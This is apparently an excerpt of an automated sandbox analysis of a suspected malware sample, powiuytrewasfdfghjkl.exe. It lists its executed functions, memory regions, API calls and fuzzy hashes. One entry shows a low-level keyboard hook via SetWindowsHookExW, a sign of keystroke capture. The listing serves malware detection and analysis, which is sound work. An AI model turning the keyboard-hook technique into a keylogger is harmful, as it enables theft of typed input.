Opcode Fuzzy Hash: 86581f832109ff263e939630d03d494fa7803d730443bf3cca7e6e8d9f4e5f97
Instruction Fuzzy Hash: BAE0C23108E2C25FDB034B30EA701D07FF0AF9731030C0CD1D1C14A152E21503A6CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powiuytrewasfdfghjkl.exe PID: 2956 Parent PID: 260 powiuytrewasfdfghjkl.exeCOMMON

Executed Functions

Function 02183E50, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0218FA43

Memory Dump Source

Source File: 00000007.00000002.2398415622.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 0db648fa88b14c8253b0652dfb67585bbe65f50311a3e54e1c4674eb72d9e7c9
Instruction ID: eeacfc5260ae7fd2d94f9ed54b387f6aae1118c849ecc601759416403f1bf06c
Opcode Fuzzy Hash: 0db648fa88b14c8253b0652dfb67585bbe65f50311a3e54e1c4674eb72d9e7c9
Instruction Fuzzy Hash: EC2104719002099FCB14DF99D884BEEFBF5FB88324F14882AE459B7250C774A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003B94A8, Relevance: 3.9, APIs: 2, Instructions: 906COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 51aeab172ec3ddd9c9fc0e652b43a72a9632f85d98af340f9746858a2aa6ab41
Instruction ID: 4b4a951fd090dbdacb3d72e261b31367d884232617e84ae9fde30b55ab51fb97
Opcode Fuzzy Hash: 51aeab172ec3ddd9c9fc0e652b43a72a9632f85d98af340f9746858a2aa6ab41
Instruction Fuzzy Hash: 58924B74E05228CFCB66DF60C95479DB7BABF88309F2084EAD609A7250DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003B94DF, Relevance: 3.6, APIs: 2, Instructions: 578COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5f59b71f6b2158f6e02ed3a40db1f95b5568904bb3ddfad85756e0824819a01b
Instruction ID: 59e66b66d22c462a0947ed53f4eb29c8d49d75716089dd6860ff75f379a3a2a9
Opcode Fuzzy Hash: 5f59b71f6b2158f6e02ed3a40db1f95b5568904bb3ddfad85756e0824819a01b
Instruction Fuzzy Hash: EB421A74A05229CFCB65DF60C95479DB7BAAF88309F2088EAD609E7640DB349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9524, Relevance: 3.6, APIs: 2, Instructions: 571COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 85d444f70ddcf79ad4933af896e755233c9f7a8a0740491d8a35ab464065e155
Instruction ID: 18965e44485a960182e1a036d1696389b7fc24b4d31cc514c2d489e376aabce7
Opcode Fuzzy Hash: 85d444f70ddcf79ad4933af896e755233c9f7a8a0740491d8a35ab464065e155
Instruction Fuzzy Hash: 61421A74A05229CFCB25DF60C95479DB7BABF88309F2088EAD609E7640DB349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9569, Relevance: 3.6, APIs: 2, Instructions: 564COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 21cd158490a62114085651e93a2118bb5829dcc0a87ccdc44a119bb575cdd89f
Instruction ID: d1711d585cbe727e22b694eb075515900e3e613ef843f845f7e013f5ce83ede2
Opcode Fuzzy Hash: 21cd158490a62114085651e93a2118bb5829dcc0a87ccdc44a119bb575cdd89f
Instruction Fuzzy Hash: CC421974A05229CFCB25DF60C95479DB7BAAF88309F2088EAD609E7640DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B95AE, Relevance: 3.6, APIs: 2, Instructions: 557COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 068fbab8ca2add9171801e6c582dd6fe5f2546c990f21867c5acd03abd6d55ad
Instruction ID: ce97a14b4eee3d2e0dadd49983d6317061e4d728d12e7e3eb4f3ed8398b9970a
Opcode Fuzzy Hash: 068fbab8ca2add9171801e6c582dd6fe5f2546c990f21867c5acd03abd6d55ad
Instruction Fuzzy Hash: D7421974E05229CFCB65DF60C95479DB7BAAF88309F2088EAD609E7640DB349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B95F3, Relevance: 3.6, APIs: 2, Instructions: 550COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8c5e6fbbe1e656afa444ef78018f843738db7de27dfc40c197e341816f1425ed
Instruction ID: 171666c662f49aa081d4e0875e0e1cc53df8932d0956affeac3d6eefcabc98b9
Opcode Fuzzy Hash: 8c5e6fbbe1e656afa444ef78018f843738db7de27dfc40c197e341816f1425ed
Instruction Fuzzy Hash: B2420874E05229CFCB65DF60C95479DB7BAAF88309F2088EAD609E7640DB349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9A4A, Relevance: 3.4, APIs: 2, Instructions: 384COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 93a3e671c4cd2f0b130cf5c1fcea54e82d04d6f76abedb3af8aecda58cd55ec5
Instruction ID: edf4346d72f701856aa160f492bce3ec4a83f6777e6240dedb4d709a70997a38
Opcode Fuzzy Hash: 93a3e671c4cd2f0b130cf5c1fcea54e82d04d6f76abedb3af8aecda58cd55ec5
Instruction Fuzzy Hash: E3020874904625CFCB66DF20C95479DB7BABF88309F2088EAD609E6740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9A8F, Relevance: 3.4, APIs: 2, Instructions: 377COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a545abc4fb3bcdb94143071eba1014fd817f1c0d514bc0d231ab4579bcc78a11
Instruction ID: a600fb524c1f0bd937b84ac885355992d9472be879e0536d6b481a86b4dbbcc3
Opcode Fuzzy Hash: a545abc4fb3bcdb94143071eba1014fd817f1c0d514bc0d231ab4579bcc78a11
Instruction Fuzzy Hash: 76020974904625CFCB66DF20C954799B7BABF88309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9AD4, Relevance: 3.4, APIs: 2, Instructions: 370COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c1f4fe53d66ada22d93ca43f60d6b730cbeda678f8cacfbca9b95e1c7ad5bb19
Instruction ID: 22182a89bea15f1f427191efb7fe0f9096222822011730545d2707651779edec
Opcode Fuzzy Hash: c1f4fe53d66ada22d93ca43f60d6b730cbeda678f8cacfbca9b95e1c7ad5bb19
Instruction Fuzzy Hash: D302F974904625CFCB66DF20C954799B7BABF88309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9B19, Relevance: 3.4, APIs: 2, Instructions: 363COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 86840a3d00e29899308f41fb5f6c5aeb45f07264d5279c0a663f1a8497474295
Instruction ID: 4cbacace72b264f185088756102e1812f7cd0443173c9f0fba599c4d209a5add
Opcode Fuzzy Hash: 86840a3d00e29899308f41fb5f6c5aeb45f07264d5279c0a663f1a8497474295
Instruction Fuzzy Hash: 7B020974904625CFCB66DF20C954799B7BABF88309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9B5E, Relevance: 3.4, APIs: 2, Instructions: 356COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fa1b8871ab292c497e0840fb2ed739d9045e77a76bbb0401d777fd1bdb9fc91a
Instruction ID: fb7e6842d8e9e18616f05c5d8df59057c1313ead0626632095bab1bb74817ca8
Opcode Fuzzy Hash: fa1b8871ab292c497e0840fb2ed739d9045e77a76bbb0401d777fd1bdb9fc91a
Instruction Fuzzy Hash: 56F10A74904625CFCB66DB20C954799B7BABF84309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9BA3, Relevance: 3.3, APIs: 2, Instructions: 349COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7591a741caf5bb0127bbc2f00c20bb934b041264e4765a480227c25d3ed04ef2
Instruction ID: d852e2fc852a5ca0ab80020c6cb09c6cc3ce306ede11ea2b36daee2620abf521
Opcode Fuzzy Hash: 7591a741caf5bb0127bbc2f00c20bb934b041264e4765a480227c25d3ed04ef2
Instruction Fuzzy Hash: 88F10A74A04625CFCB66DB20C95479DB7BABF84309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9BE8, Relevance: 3.3, APIs: 2, Instructions: 342COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ae97caec3b76b9280bd98f8057daa4e239ca43219935dcd930bd58fa97535632
Instruction ID: 8b0140443cf2245ac6144dbe36ab93014d1978a79034bfc40bbbfdae3400e60e
Opcode Fuzzy Hash: ae97caec3b76b9280bd98f8057daa4e239ca43219935dcd930bd58fa97535632
Instruction Fuzzy Hash: E5F10A74A04625CFCB66DB20C95479DB7BABF84309F2088EAD609E7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9C2D, Relevance: 3.3, APIs: 2, Instructions: 335COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bc27cb0cc5c95592a21af91b24ff418ca1d3b4153c2c35fc0fee1e4eac245f30
Instruction ID: 6c6c54cad6d781837ce30062bdc789bccf63960f5804e6616ece19ffa8d5b9ed
Opcode Fuzzy Hash: bc27cb0cc5c95592a21af91b24ff418ca1d3b4153c2c35fc0fee1e4eac245f30
Instruction Fuzzy Hash: 54F10A74A04625CFCB66DB20C95479DB7BABF84309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9C72, Relevance: 3.3, APIs: 2, Instructions: 328COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f189cecbb54c6367eefb2907abde79de295ea60ac251eca2d7ff42e863623993
Instruction ID: b5d8c863c67b37a3616b16fbf739ee0af32a25e2c95d2193aec25a2acf8dd759
Opcode Fuzzy Hash: f189cecbb54c6367eefb2907abde79de295ea60ac251eca2d7ff42e863623993
Instruction Fuzzy Hash: 41E11A74A04625CFCB66DB20C95479DB7BABF84309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9CB7, Relevance: 3.3, APIs: 2, Instructions: 321COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: beebc6433da4b4cbbac137a681e1596dc3e66409839a07fc431b20a4b42a6236
Instruction ID: 09156ca99ca3983e3cda86c8e6dab3ce08cee7d75a188effbfbcc5af4fcf752d
Opcode Fuzzy Hash: beebc6433da4b4cbbac137a681e1596dc3e66409839a07fc431b20a4b42a6236
Instruction Fuzzy Hash: 6FE11A74A04625CFCB65DB20C95479DB7BABF84309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9CFC, Relevance: 3.3, APIs: 2, Instructions: 314COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5dc8cc02e2a4218bd2b0d0eb7aab0e80fc2412416bb07b63edf486ae0a2e5570
Instruction ID: 179f781a92483bca1270d936a93be8c0c5e5e73270545dd69336a7d912e75824
Opcode Fuzzy Hash: 5dc8cc02e2a4218bd2b0d0eb7aab0e80fc2412416bb07b63edf486ae0a2e5570
Instruction Fuzzy Hash: 6FE12A74A04625CFCB65DB20C95479DB7BABF88309F2088EAD609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9D41, Relevance: 3.3, APIs: 2, Instructions: 307COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a2656d85e35544b16aa4c69f2e8999c05f5c323450028d24a2b02cebc9187ba6
Instruction ID: 4ce06e03a349e6050c7c23afb0031c8d2dce941a6837320e96692effaaa4ce80
Opcode Fuzzy Hash: a2656d85e35544b16aa4c69f2e8999c05f5c323450028d24a2b02cebc9187ba6
Instruction Fuzzy Hash: 72E12A74A04625CFCB25DB20C95479DB7BABF88309F2088E9D609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9D86, Relevance: 3.3, APIs: 2, Instructions: 300COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e5dcf0cd1ce0402d195a468f2b8c499a1d75e804bd49c40a8116c7627271a8a2
Instruction ID: c30e1017f0740a8200367e4160dcd67b259a7717593668f3073b1ebdd88bbb42
Opcode Fuzzy Hash: e5dcf0cd1ce0402d195a468f2b8c499a1d75e804bd49c40a8116c7627271a8a2
Instruction Fuzzy Hash: 43D13A74A44625CFCB25DB20C95479DB7BABF88309F2088EAC609E7740DB359E81CF46

Uniqueness

Uniqueness Score: -1.00%

Function 003B9DCE, Relevance: 3.3, APIs: 2, Instructions: 293COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 75b483671e8cf7f34d2fe329f866e6a61ec886043b78554662056443c9507923
Instruction ID: 668b6181d09ec575e6ea778ac85b55a1baa18bfc87bff43bc786f71f467d303b
Opcode Fuzzy Hash: 75b483671e8cf7f34d2fe329f866e6a61ec886043b78554662056443c9507923
Instruction Fuzzy Hash: CFD13A74A44625CFCB65DB20C95479DB7BABF88309F2088EAC609E7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9E16, Relevance: 3.3, APIs: 2, Instructions: 286COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003B9E3D
KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cbd9e9537cf9c4277ab6f552e16a92c6c11173351591ea7f075c2f164f1ad6a6
Instruction ID: 79d94ffad08c2342051b6542804adcacc3803e874b916a814dcd5c9f62e7dd9d
Opcode Fuzzy Hash: cbd9e9537cf9c4277ab6f552e16a92c6c11173351591ea7f075c2f164f1ad6a6
Instruction Fuzzy Hash: 9FD14A74A04629CFCB25DB20C95479DB7BABF88309F2088EAD609E7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9E5E, Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ce93f0308dd1a1c7ed50ba51f3c45bb6b282fa90a7dc86fb1b644e2629614c41
Instruction ID: a4c72fbfb5e37bb1eba642bd71870666937402256a533ff62616ff85f4c6e285
Opcode Fuzzy Hash: ce93f0308dd1a1c7ed50ba51f3c45bb6b282fa90a7dc86fb1b644e2629614c41
Instruction Fuzzy Hash: 87C13A74A44629CFCB25DB20C95479DB7BABF88309F2088EAD609E7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9EA6, Relevance: 1.8, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4f1972da61061c662052e2bc58bda43b3dec4bb8e682c17f7e0fb79504922cf9
Instruction ID: 19cb09abdbe6253a211f2e640299969c2b36380d80aba5a1ed93461cca11d01c
Opcode Fuzzy Hash: 4f1972da61061c662052e2bc58bda43b3dec4bb8e682c17f7e0fb79504922cf9
Instruction Fuzzy Hash: 7EC14A74A44629CFCB25DB20C95479DB7BABF88309F2088E9C60AE7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9EEE, Relevance: 1.8, APIs: 1, Instructions: 265COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c331b8991c142b4a76b6b60225615b085c300d1439b423592101549f64625adb
Instruction ID: ca20d06fb2f5afec4aade9adb53a705c8f1ef8648785f230cfab0cdc31e0a6f0
Opcode Fuzzy Hash: c331b8991c142b4a76b6b60225615b085c300d1439b423592101549f64625adb
Instruction Fuzzy Hash: ABC15A74A44629CFCB25DF20C95479DB7BAAF88309F2088E9C60AE7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9F36, Relevance: 1.8, APIs: 1, Instructions: 258COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9a576c06152a81c3a419c84de042d7da85e26e354979df89aff54832b45cef3c
Instruction ID: cf22b3394995b8ba62e602880ec062f4f4f64c37908bee02f3831bf442e792af
Opcode Fuzzy Hash: 9a576c06152a81c3a419c84de042d7da85e26e354979df89aff54832b45cef3c
Instruction Fuzzy Hash: AEB15A74A44629CFCB25DF60C95479DB7BAAF88309F2088E9C60AE7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9F7E, Relevance: 1.8, APIs: 1, Instructions: 251COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 00c41117e66b3f582db8543b5b7e05c7da89bca2c7de6901b561e9456a0b4fa5
Instruction ID: d66528cf8b2b4e35ec3c0473db06ae2b046d44a37ad034e1f19de88ed944d854
Opcode Fuzzy Hash: 00c41117e66b3f582db8543b5b7e05c7da89bca2c7de6901b561e9456a0b4fa5
Instruction Fuzzy Hash: C0B16A74A44629CFCB25DF60C95479DB7BAAF88309F2088E9C60AE7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B9FC6, Relevance: 1.7, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 078d5b1f3de51020f6960134b7359ac74849c8d646b93165fbbc3bba7a8594b9
Instruction ID: a724b7a723a8e10e108547eb00b6e500ae3354deb2759a3b22ddf7da6f8c83da
Opcode Fuzzy Hash: 078d5b1f3de51020f6960134b7359ac74849c8d646b93165fbbc3bba7a8594b9
Instruction Fuzzy Hash: 79B16C74A44625CFCB25DF60C95479DB7BAAF88309F2088E9C609E7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA00E, Relevance: 1.7, APIs: 1, Instructions: 237COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e79cc9f73bfe8c8dc8e9367c002c42c572dc674de0a5a292bcf802469d27ead7
Instruction ID: 615ae66c83d34df3864d563699f163f123c4b2dd1eef741ec5fd32823486977a
Opcode Fuzzy Hash: e79cc9f73bfe8c8dc8e9367c002c42c572dc674de0a5a292bcf802469d27ead7
Instruction Fuzzy Hash: 09A16C74A44629CFCB25DF20C95479DB7BAAF88309F2088E9D60AE7740DB359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA056, Relevance: 1.7, APIs: 1, Instructions: 230COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d7783922d8e4f3df69eb73b54534497407fea9a41c8f3c4dfd3823d4f4b0d2b9
Instruction ID: e11f2f37b8128864dacd6f5a424d4ac481bc137cad7f0ce4b54a5bd1016d74a1
Opcode Fuzzy Hash: d7783922d8e4f3df69eb73b54534497407fea9a41c8f3c4dfd3823d4f4b0d2b9
Instruction Fuzzy Hash: 03A16C74A44629CFCB25DF20C99479DB7BAAF88309F2088A9D609E7740DF359E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA09E, Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 653cb396b27053d21a83d2da5636eecab999a5bc78851649edd656df6ade9039
Instruction ID: d5d65a45ec898509864a2835668973f3f574f7b4fe9efa43a3aadcd90a5ea62d
Opcode Fuzzy Hash: 653cb396b27053d21a83d2da5636eecab999a5bc78851649edd656df6ade9039
Instruction Fuzzy Hash: 5AA17C74A44629CFCB25DF20C99479DB3BAAF88309F2088A9D609E7740DF349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA0E6, Relevance: 1.7, APIs: 1, Instructions: 216COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c703e5e5b30846c7d5a2bb0bc2aa2fba31fdb4ab732e38a48dc52b74003f68a1
Instruction ID: ba5bb5f9015f11cd523cd3792116cd96a26f6fd51c044a7570b0f96dec983d22
Opcode Fuzzy Hash: c703e5e5b30846c7d5a2bb0bc2aa2fba31fdb4ab732e38a48dc52b74003f68a1
Instruction Fuzzy Hash: BD917C74A44629CFCB25DF24C99479DB7BAAF88309F2088A9D609E7740DF349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA12E, Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a61f272900dd6ff6a65b86bc50cc2c57af7d22ec217ec3dd62df0b328ef166ac
Instruction ID: 7f8fb3f57a2331403cff893bd368e38bb4b39a3fd5f50fc87b3f169015ae9aca
Opcode Fuzzy Hash: a61f272900dd6ff6a65b86bc50cc2c57af7d22ec217ec3dd62df0b328ef166ac
Instruction Fuzzy Hash: 0F918C74A446298FCB25DF20C99479DB3BAAF88308F2088A9D609E7740DF349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA176, Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d8ab1c5d42db2b010bd5c49bc8d6177ca8ece902300febc72c721a048c9ad555
